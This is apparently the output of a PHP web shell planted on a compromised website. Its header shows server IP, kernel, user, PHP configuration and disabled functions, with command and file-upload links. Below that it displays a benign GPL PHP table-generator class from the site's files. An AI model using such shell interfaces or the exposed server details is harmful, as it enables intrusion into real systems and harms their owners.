|
Server IP : 124.109.2.77 / Your IP : 216.73.216.49 Web Server : Apache/2 System : Linux ns4.amiprocorp.com 3.10.0-1160.76.1.el7.x86_64 #1 SMP Wed Aug 10 16:21:17 UTC 2022 x86_64 User : cpctlp ( 1020) PHP Version : 5.6.40 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : ON | cURL : ON | WGET : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/wget) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 329 OFF | Perl : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/perl) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 335 OFF | Python : Warning: file_exists(): open_basedir restriction in effect. File(/usr/bin/python2) is not within the allowed path(s): (/home/cpctlp/:/tmp/:/var/tmp/:/opt/alt/php83/usr/share/pear/:/dev/urandom:/usr/local/php56/lib/:/usr/local/php83/lib/:/usr/local/php74/lib/:/usr/local/php56/lib/:/usr/local/lib/php/) in /home/cpctlp/domains/cpctlphp.com/public_html/admin/images/News/202602260302550.php on line 341 OFF Directory (0755) : /home/cpctlp/domains/cpctlphp.com/public_html/admin/tcpdf/tools/../tools/../class/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* @author Michele Andreoli <michi.andreoli@gmail.com>
* @name Table.class.php
* @version 0.1
* @license http://opensource.org/licenses/gpl-license.php GNU Public License
* @package TableGenerator
*/
class Table {
private $zebra;
private $tableId;
private $tableClass;
private $headerId;
private $headerClass;
private $bodyId;
private $bodyClass;
private $footerId;
private $footerClass;
private $zebraClass;
private $tableWidth;
private $columnsWidth;
/**
* Constructor for table class
* @param <Boolean> $zebra set on/off the zebra mode
* @param <String> $id id name for this table
* @param <String> $class class name for this table
*/
public function __construct($zebra=null, $id=null, $class=null) {
if ($id != null)
$this->tableId = "id=\"$id\"";
if ($class != null)
$this->tableClass = "class=\"$class\"";
if ($zebra != null)
$this->zebra = true;
else
$this->zebra = false;
}
/**
* Setter for zebra mode
* @param <type> $zebra set on/off the zebra mode
*/
public function setZebra($zebra) {
$this->zebra = $zebra;
}
/**
* Setter for table width
* @param <String> $string width of table for example '600px' or '100%'
*/
public function setTableWidth($string) {
$this->tableWidth = "style=\"width:$string\"";
}
/**
* Setter for columns width
* @param <Array> $array array with the width for every column
*/
public function setColumnsWidth($array) {
foreach ($array as $elem) {
if ($elem != "")
$this->columnsWidth[] = "style=\"width:$elem\"";
else
$this->columnsWidth[] = "";
}
}
/**
* Setter for table class name
* @param <String> $class class name
*/
public function setTableClass($class) {
$this->tableClass = "class=\"$class\"";
}
/**
* Setter for table id name
* @param <String> $id id name
*/
public function setTableId($id) {
$this->tableId = "id=\"$id\"";
}
/**
* Setter for thead class name
* @param <String> $class class name
*/
public function setHeaderClass($class) {
$this->headerClass = "class=\"$class\"";
}
/**
* Setter for thead id name
* @param <String> $id id name
*/
public function setHeaderId($id) {
$this->headerId = "id=\"$id\"";
}
/**
* Setter for tbody class name
* @param <String> $class class name
*/
public function setBodyClass($class) {
$this->bodyClass = "class=\"$class\"";
}
/**
* Setter for tbody id name
* @param <String> $id id name
*/
public function setBodyId($id) {
$this->bodyId = "id=\"$id\"";
}
/**
* Setter for tfoot class name
* @param <String> $class class name
*/
public function setFooterClass($class) {
$this->footerClass = "class=\"$class\"";
}
/**
* Setter for tfoot id name
* @param <String> $id id name
*/
public function setFooterId($id) {
$this->footerId = "id=\"$id\"";
}
/**
* Print the table
* @param <Array> $headers header for every column
* @param <Array> $data data matrix
*/
public function showTable($headers, $data) {
$count = 0;
$table = "<table $this->tableWidth $this->tableId $this->tableClass>";
//HEADER
$table .= "<thead $this->headerId $this->headerClass><tr>";
foreach($headers as $h) {
$style = $this->columnsWidth[$count];
$table .= "<td $style>$h</td>";
$count++;
}
$table .= "</tr></thead>";
//FOOTER
$table .= "<tfoot $this->footerId $this->footerClass><tr>";
foreach($headers as $h)
$table .= "<td></td>";
$table .= "</tr></tfoot><tbody $this->bodyId $this->bodyClass>";
//BODY
$count = 0;
foreach ($data as $row) {
if ($this->zebra) {
$count++;
if ($count%2 == 1)
$this->zebraClass = "class=\"zebraOn\"";
else
$this->zebraClass = "class=\"zebraOff\"";
}
$table .= "<tr $this->zebraClass>";
foreach ($row as $col)
$table .= "<td>$col</td>";
$table .= "</tr>";
}
$table .= "</tbody></table>";
echo $table;
}
}
?>